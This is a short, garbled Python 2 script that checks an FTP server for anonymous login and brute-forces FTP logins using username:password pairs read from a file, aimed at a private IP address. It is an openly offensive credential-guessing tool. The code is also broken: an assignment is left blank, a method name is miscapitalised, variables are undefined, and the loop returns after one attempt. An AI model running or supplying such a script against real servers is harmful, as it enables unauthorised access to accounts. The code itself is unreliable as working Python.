import ftplib

def bruteLogin(hostname, passwdFile):
    pF = open(passwdFile, 'r')
    for line in pF.readLines():
        userName = line.split(':')[0]
        password = line.split(':')[1].strip('\r').strip('\n')
        print "[+] Attempting: " + userName+"/"+password
        try:
            ftp =
            ftp.login(userName, password)
            print '\n [*] FTP login suceeded: '+userName+"/"+password
            ftp.quit()
            return (userName, passWord)
        except Exception, e:
            pass
        print '\n [-] Could not brute force ftp logi'
        return(None, None)
def anonLogin(hostname):
    try:
        ftp = ftplib.FTP(hostname)
        ftp.login('anonymous', 'me@your.com')
        print '\n[*] '+ str(hostname) + ' FTP Anon Login Succeeded'
        ftp.quit()
        return True
    except Exception, e:
        print '\n[-] ' + str(hostname) + ' FTP Anon Login Failed.'
        return False
   host = '192.168.95.179'
   anonLogin(host)
   bruteLogin(host, passwdFile)
